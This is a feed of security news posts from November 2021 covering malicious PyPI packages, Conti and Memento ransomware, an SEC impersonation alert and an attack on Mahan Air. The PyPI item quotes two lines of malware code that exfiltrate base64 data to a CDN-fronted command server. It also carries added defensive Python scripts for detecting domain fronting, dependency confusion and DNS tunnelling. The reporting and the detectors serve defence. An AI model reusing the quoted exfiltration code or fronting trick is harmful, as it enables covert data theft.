(2021-07-19) dedic-cuprum-617836.hosted-by-itldc.com dedic-cuprum-617836

The security firm shared its findings with law enforcement authorities.

The experts also shared the contents of the htpasswd file of the host, which can be used in future investigations into the Conti operations.

The PTI team was also able to discover multiple victim chat sessions and captured login credentials for MEGA accounts used while contacting the victims. Experts were able to discover the connecting IP addresses, dates, the purchase method, and the software used for accessing the file sharing and upload service.

After the publication of the report, the Conti operators took their payment portal offline, MalwareHunterTeam researchers confirmed.

So, while both the clearweb and Tor domains of the leak site of the Conti ransomware gang are online and working, both their clearweb and Tor domains for the payment site (which is obviously more important than the leak) are down, possibly from some hours ago already…
🤔 pic.twitter.com/hmzR463tFP

— MalwareHunterTeam (@malwrhunterteam) November 18, 2021


Pierluigi Paganini

(SecurityAffairs – hacking, Operation Cyclone)


Experts found 11 malicious Python packages in the PyPI repository

21 November 2021 at 18:52

Researchers discovered 11 malicious Python packages in the PyPI repository that can steal Discord access tokens, passwords, and conduct attacks.

JFrog researchers have discovered 11 malicious Python packages in the Python Package Index (PyPI) repository that can steal Discord access tokens, passwords, and even carry out dependency confusion attacks.

Below is the list of malicious Python packages:

  • importantpackage / important-package
  • pptest
  • ipboards
  • owlmoon
  • DiscordSafety
  • trrfab
  • 10Cent10 / 10Cent11
  • yandex-yt
  • yiffparty

The packages “importantpackage,” “10Cent10,” and “10Cent11” were able to establish a reverse shell on the compromised machine.

Experts pointed out that “importantpackage” abused CDN TLS termination for data exfiltration: it uses the Fastly CDN to disguise communications with the C2 server as communication with pypi.org.

“The malware’s communication is quite simple:

url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload
r = request.Request(url, headers = {'Host': "psec.forward.io.global.prod.fastly.net"})

This code causes an HTTPS request to be sent to pypi.python.org (which is indistinguishable from a legitimate request to PyPI,) which later gets rerouted by the CDN as an HTTP request to the C2 server psec.forward.io.global.prod.fastly.net (and vice versa, allowing for two-way communication).” states the report published by JFrog.
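The defender-side view of the trick JFrog describes is a mismatch between the hostname a connection is addressed to (TLS SNI and URL) and the one in the HTTP Host header, which is what the CDN actually routes on. The following script is an added example, not JFrog's code, that scans an egress proxy log for exactly that disagreement and, where the URL carries the base64 `guid` parameter shown in the report, decodes it for the analyst. The log format, client addresses and log lines are constructed; the Fastly edge hostname is the one quoted from the report above.

```python
"""Spotting CDN host-header fronting in web proxy logs.

Added example; not JFrog's code. A fronted request presents one hostname in the
TLS SNI and URL and another in the HTTP Host header, and the CDN routes on Host.
The log format, client addresses and lines are constructed; the Fastly edge
hostname is the one quoted in JFrog's report.
"""
import base64
import re
from urllib.parse import parse_qs, urlparse

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) sni=(?P<sni>\S+) host=(?P<host>\S+) url=(?P<url>\S+)$"
)

# Constructed proxy log: one benign PyPI request, one fronted request that
# mimics the report's "/images?guid=<base64>" pattern, one unrelated request.
PROXY_LOG = [
    "2021-11-18T10:01:02Z 10.1.2.3 sni=pypi.python.org host=pypi.python.org url=https://pypi.python.org/simple/requests/",
    "2021-11-18T10:01:05Z 10.1.2.3 sni=pypi.python.org host=psec.forward.io.global.prod.fastly.net url=https://pypi.python.org/images?guid=ZXhhbXBsZQ==",
    "2021-11-18T10:02:11Z 10.1.2.9 sni=www.example.com host=www.example.com url=https://www.example.com/",
]


def parse_line(line):
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def is_fronted(rec):
    """True when the Host header disagrees with the SNI or with the URL host."""
    sni = rec["sni"].lower()
    host = rec["host"].lower()
    url_host = (urlparse(rec["url"]).hostname or "").lower()
    return host != sni or host != url_host


def decode_guid(url):
    """Decode a base64 'guid' query value if present and well-formed, else None."""
    values = parse_qs(urlparse(url).query).get("guid")
    if not values:
        return None
    try:
        return base64.b64decode(values[0], validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError
        return None


def find_fronted(lines):
    """Return the records whose Host header points somewhere other than the SNI/URL host."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec and is_fronted(rec):
            rec["decoded_guid"] = decode_guid(rec["url"])
            hits.append(rec)
    return hits


if __name__ == "__main__":
    for hit in find_fronted(PROXY_LOG):
        print(hit["client"], hit["sni"], "->", hit["host"], hit["decoded_guid"])
```

The check only works if the proxy records both the SNI and the Host header; a proxy that logs only the URL sees a perfectly normal request to pypi.python.org, which is the whole point of the technique.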

The “ipboards” and “trrfab” packages were able to exfiltrate sensitive information by using a technique called dependency confusion.

The dependency confusion technique consists of uploading to public repositories tainted packages that carry the same name as an organization’s legitimate internal private packages but a higher version number. This tricks the target’s package manager into downloading and installing the malicious module instead of the internal one.
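The attack works because a resolver that consults more than one index simply takes the highest version it finds for a name. A pre-flight check an organization can run against its own package list is shown below as an added example (not JFrog's code): it normalizes names the way PyPI does, compares each private package against a snapshot of what the public index offers, and reports which collisions a version-maximizing resolver would resolve to the public copy; it also flags the pip setting that makes the merge happen. The package names, versions, public snapshot and pip.conf are constructed; a real check would query https://pypi.org/pypi/<name>/json for each name.

```python
"""Pre-flight check for dependency confusion.

Added example; not JFrog's code. Compares the organisation's private package
names against a snapshot of what the public index offers and flags collisions
that a version-maximising resolver would resolve to the public copy. Package
names, versions, the public snapshot and the pip.conf are constructed; a real
check would query https://pypi.org/pypi/<name>/json for each name.
"""
import re


def normalize(name):
    """PEP 503 name normalisation: acme_billing, acme.billing and Acme-Billing are one name."""
    return re.sub(r"[-_.]+", "-", name).lower()


def parse_version(version):
    """Numeric-only version key (no pre-release rules); use packaging.version in production."""
    return tuple(int(p) for p in re.findall(r"\d+", version))


# Constructed: private packages published only on the internal index.
INTERNAL_PACKAGES = {"acme_billing": "2.3.0", "acme-utils": "0.9.1", "acme.reports": "1.0.0"}
# Constructed snapshot of the public index for those normalised names.
PUBLIC_INDEX = {"acme-billing": ["0.0.1", "99.0.0"], "acme-reports": ["1.0.0"]}


def find_collisions(internal, public):
    """Every private name that also exists publicly, and whether the public copy outranks ours."""
    hits = []
    for name, version in internal.items():
        norm = normalize(name)
        releases = public.get(norm)
        if not releases:
            continue
        newest = max(releases, key=parse_version)
        hits.append({
            "name": norm,
            "internal": version,
            "public_newest": newest,
            # A resolver that merges indexes prefers the highest version it sees.
            "public_wins": parse_version(newest) > parse_version(version),
        })
    return hits


# Constructed pip.conf showing the risky layout: public index plus private "extra".
SAMPLE_PIP_CONF = """\
[global]
index-url = https://pypi.org/simple
extra-index-url = https://pkgs.corp.example/simple
"""


def risky_index_settings(pip_conf):
    """Flag extra-index-url: pip searches every configured index and takes the best
    version across all of them, so the private index must be the sole index-url
    (ideally a proxy that mirrors vetted public packages)."""
    return [line.strip() for line in pip_conf.splitlines()
            if line.strip().lower().startswith("extra-index-url")]


if __name__ == "__main__":
    for hit in find_collisions(INTERNAL_PACKAGES, PUBLIC_INDEX):
        print(hit)
    print(risky_index_settings(SAMPLE_PIP_CONF))
```

A collision where the public copy does not outrank the private one is still worth reporting: the next public upload can change that at any time, so the durable fix is to register the private names publicly or route all installs through a single private index.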

The “ipboards” and “pptest” packages were found to use DNS tunneling for data exfiltration; this is the first time this technique has been observed in malware uploaded to PyPI.
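DNS tunneling leaves a characteristic trace in resolver logs: many distinct, long, high-entropy subdomains under one registered domain, because each query carries a chunk of encoded data. The script below is an added example (not JFrog's code) of a triage pass over such logs that groups queries by registered domain and flags domains whose subdomain labels look like encoded payload rather than host names. The log format and all log lines are constructed, the exfiltration domain included; the "exfil" subdomains are generated from SHA-256 digests to stand in for encoded chunks.

```python
"""DNS-tunnelling triage over resolver logs.

Added example; not JFrog's code. Groups queries by registered domain and flags
domains whose subdomain labels are numerous, long and high-entropy. The log
format and every line are constructed; the "exfil" labels are SHA-256 prefixes
standing in for encoded data chunks.
"""
import hashlib
import math
from collections import defaultdict


def _fake_chunk(i):
    """Constructed stand-in for one encoded data chunk (32 hex characters)."""
    return hashlib.sha256(f"chunk{i}".encode()).hexdigest()[:32]


# Constructed resolver log: "<timestamp> <client> <qname> <qtype>".
DNS_LOG = [
    "2021-11-18T10:00:01Z 10.1.2.3 www.example.com A",
    "2021-11-18T10:00:02Z 10.1.2.3 mail.corp.example A",
    "2021-11-18T10:00:03Z 10.1.2.4 api.corp.example A",
    "2021-11-18T10:00:04Z 10.1.2.4 www.corp.example A",
] + [f"2021-11-18T10:00:{10 + i:02d}Z 10.1.2.5 {_fake_chunk(i)}.exfil.example TXT"
     for i in range(8)]


def shannon_entropy(s):
    """Bits per character; hex-encoded data sits near 4, host names well below 3."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_qname(qname):
    """(subdomain, registered_domain) using the last two labels.
    Simplification: production code must consult the public suffix list."""
    labels = qname.rstrip(".").lower().split(".")
    if len(labels) < 3:
        return "", ".".join(labels)
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def flag_tunneling(lines, min_unique=5, min_len=20, min_entropy=3.0):
    """Return {registered_domain: stats} for domains whose subdomains look like encoded data."""
    per_domain = defaultdict(list)
    for line in lines:
        parts = line.split()
        if len(parts) < 3:
            continue
        sub, domain = split_qname(parts[2])
        if sub:
            per_domain[domain].append(sub)
    flagged = {}
    for domain, subs in per_domain.items():
        unique = set(subs)
        if len(unique) < min_unique:
            continue
        avg_len = sum(len(s) for s in unique) / len(unique)
        avg_entropy = sum(shannon_entropy(s.replace(".", "")) for s in unique) / len(unique)
        if avg_len >= min_len and avg_entropy >= min_entropy:
            flagged[domain] = {
                "queries": len(subs),
                "unique_subdomains": len(unique),
                "avg_subdomain_len": round(avg_len, 1),
                "avg_entropy": round(avg_entropy, 2),
            }
    return flagged


if __name__ == "__main__":
    print(flag_tunneling(DNS_LOG))
```

The thresholds are deliberately conservative so that CDN and cloud hostnames with one or two long labels do not trip it; tuning them against a week of the organization's own resolver logs before alerting on them is the usual first step.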

“While this set of malicious packages may not have the same ‘teeth’ as our previous discoveries, what’s notable is the increasing level of sophistication with which they are executed. It’s not reaching for your wallet in broad daylight – but there is a lot more subterfuge going on with these packages, and some of them may even be setting up for a follow-up attack after the initial reconnaissance, instead of running a highly-compromising payload to start.” concludes the report.


Pierluigi Paganini

(SecurityAffairs – hacking, Operation Cyclone)


US SEC warns investors of ongoing fraudulent communications claiming to be from the SEC

22 November 2021 at 06:27

The Securities and Exchange Commission (SEC) warns investors of attacks impersonating its officials in government impersonator schemes.

The Securities and Exchange Commission (SEC) is warning investors of scammers impersonating SEC officials in fraudulent schemes.

According to the alert issued by the SEC’s Office of Investor Education and Advocacy (OIEA), crooks are contacting investors via phone calls, voicemails, emails, and letters.

“We are aware that several individuals recently received phone calls or voicemail messages that appeared to be from an SEC phone number. The calls and messages raised purported concerns about unauthorized transactions or other suspicious activity in the recipients’ checking or cryptocurrency accounts. These phone calls and voicemail messages are in no way connected to the Securities and Exchange Commission.” reads the alert.

The alert recommends investors not provide any personal information in case they receive a communication that appears to be from the Securities and Exchange Commission. They are invited to directly contact the commission.

Investors can check the identity of someone behind calls or messages using the SEC’s personnel locator at (202) 551-6000, or call (800) SEC-0330 or email [email protected]

Investors can also file a complaint with the Securities and Exchange Commission’s Office of Inspector General at www.sec.gov/oig or call the OIG’s toll-free hotline at (833) SEC-OIG1 (732-6441).

“Beware of government impersonator schemes. Con artists have used the names of real SEC employees and email messages that falsely appear to be from the Securities and Exchange Commission to trick victims into sending the fraudster’s money. Impersonation of US Government agencies and employees (as well as of legitimate financial services entities) is one common feature of advance fee solicitations and other fraudulent schemes. Even where the fraudsters do not request that funds be sent directly to them, they may use personal information they obtain to steal an individual’s identity or misappropriate their financial assets.” continues the alert.


Pierluigi Paganini

(SecurityAffairs – hacking, SEC)


Facebook Postpones Plans for E2E Encryption in Messenger, Instagram Until 2023

22 November 2021 at 07:30
Meta, the parent company of Facebook, Instagram, and WhatsApp, disclosed that it doesn't intend to roll out default end-to-end encryption (E2EE) across all its messaging services until 2023, pushing its original plans by at least a year. "We're taking our time to get this right and we don't plan to finish the global rollout of end-to-end encryption by default across all our messaging services

New Memento ransomware uses password-protected WinRAR archives to block access to the files

22 November 2021 at 10:04

Memento ransomware group locks files inside WinRAR password-protected archives after having observed that its encryption process is blocked by security firms.

In October, Sophos researchers spotted the Memento ransomware, which adopts a curious approach to block access to victims’ files. The ransomware copies files into password-protected WinRAR archives using a renamed freeware version of the legitimate WinRAR utility. It then encrypts the password and deletes the original files from the victim’s system.

The group initially attempted to encrypt files directly, but it was blocked by defense solutions. It then changed tactics, using the above process and demanding $1 million to restore the files. The gang also allows the recovery of single files for 0.099 BTC (5036.21 EUR).

Like other groups, the Memento Team threatens to leak data if the victim does not pay the ransom.

The Python ransomware is compiled with PyInstaller; once it has blocked access to the files, it drops a ransom note instructing the victims to contact the gang via Telegram. Sophos also noticed that the threat actors deployed an open-source Python-based keylogger on several machines and made lateral movements within the network using Remote Desktop Protocol and SSH.

The gang was observed exploiting the CVE-2021-21972 vulnerability in VMware vCenter Server for the initial access to target networks.

vCenter Server is the centralized management utility for VMware, and is used to manage virtual machines, multiple ESXi hosts, and all dependent components from a single centralized location.

The flaw could be exploited by remote, unauthenticated attackers without user interaction.

“The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8.” reads the advisory published by VMware. “A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.”

The issue affects the vCenter Server plugin for vROPs, which is available in all default installations. vROPs does not need to be present for this endpoint to be available. The virtualization giant has provided workarounds to disable it.

VMware addressed the flaw in February, but thousands of installs remained unpatched, and groups like the Memento Team focused their operations on exploiting them.

Below is the attack chain used by the Memento gang:

[Image: Memento ransomware attack chain]

Once they had gained access to the target network, the intruders first attempted to expand their reach using RDP, then after a couple of weeks began to use WinRAR to compress a collection of files for exfiltration. The ransomware operators moved the archives to a directory on a shared drive they could access via RDP before wiping files using Jetico’s BCWipe data wiping utility.

“The modifications to the ransomware changed its behavior to avoid detection of encryption activity. Instead of encrypting files, the “crypt” code now put the files in unencrypted form into archive files, using the copy of WinRAR, saving each file in its own archive with a .vaultz file extension. Passwords were generated for each file as it was archived. Then the passwords themselves were encrypted.” reads the analysis published by Sophos. “These variants were built and executed hours after the first attempt. The malware was spread manually by the attackers, using RDP and stolen credentials.”

Sophos states that in the attacks it has investigated, victims did not pay the ransom because they used their backups to restore the files.


Pierluigi Paganini

(SecurityAffairs – hacking, Memento ransomware)


Hackers Exploiting ProxyLogon and ProxyShell Flaws in Spam Campaigns

22 November 2021 at 11:47
Threat actors are exploiting ProxyLogon and ProxyShell exploits in unpatched Microsoft Exchange Servers as part of an ongoing spam campaign that leverages stolen email chains to bypass security software and deploy malware on vulnerable systems. The findings come from Trend Micro following an investigation into a number of intrusions in the Middle East that culminated in the distribution of a

Iran’s Mahan Air claims it has failed a cyber attack, hackers say the opposite

22 November 2021 at 11:49

Iranian airline Mahan Air was hit by a cyberattack on Sunday morning, the “Hooshyarane Vatan” hacker group claimed responsibility for the attack.

Iranian private airline Mahan Air foiled a cyber attack over the weekend, Iranian state media reported. The airline’s flight schedule was not affected by the attack.

“Our international and domestic flights are operating on schedule without any disruptions,” Amirhossein Zolanvari, head of the airline’s public relations office, told state TV.

According to Iran’s Fars News Agency, Mahan Air has been hit by similar attacks “many times,” which is why Mahan’s Cyber Security Team was able to neutralize this one rapidly.

“This is considered a normal occurrence and Mahan’s Cyber Security Team has always acted intelligently and in a timely manner to neutralize these attacks,” said the company, adding that all flights were on schedule and that the company would update if any flights were disrupted.

Hooshyarane Vatan hacker group claimed responsibility for the attack and added that it was able to access internal documents, emails and reports that linked the airline to the IRGC. The group explained that the company was able to detect the security breach, but did not stop it.

We, the Hooshyarane Vatan group, carried out a cyber operation against the #MahanAir company as the beating heart of the smuggling operations of the #IRGC. #Ahvaz #NoToTheIslamicRepublic #IranProtests #MahanAir pic.twitter.com/bBkfBKJ4uK

— Hooshyarane Vatan (@Hooshyaran1) November 21, 2021

The US had sanctioned Mahan Air in 2011 for providing financial, material, or technological support to Iran’s Islamic Revolutionary Guard Corps.

Tension is high between Tehran and the Western countries, which blame Iran for a series of attacks against organizations worldwide.

A joint advisory released by government agencies in the U.S., U.K., and Australia (the FBI, the Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), and the United Kingdom’s National Cyber Security Centre (NCSC)) warns that Iran-linked threat actors are exploiting Fortinet and Microsoft Exchange vulnerabilities in attacks aimed at critical infrastructure in the US and at Australian organizations.

Microsoft Threat Intelligence Center (MSTIC) recently shared the results of their analysis on the evolution of Iran-linked threat actors at the CyberWarCon 2021. Over the past 12 months, MSTIC experts observed increasingly sophisticated attacks orchestrated by Iranian APT groups.

Iran has been targeted by a series of cyber attacks in the past months; in October, a cyber attack disrupted gas stations of the state-owned National Iranian Oil Products Distribution Company (NIOPDC) across Iran. The attack also defaced the screens at the gas pumps and the gas price billboards.

Digital screens at the affected stations were displaying the message “cyberattack 64411,” which was also shown on the billboards of Iranian train stations during another attack that took place in July and that hit Iran’s railroad system.


Pierluigi Paganini

(SecurityAffairs – hacking, Iran’s Mahan Air)
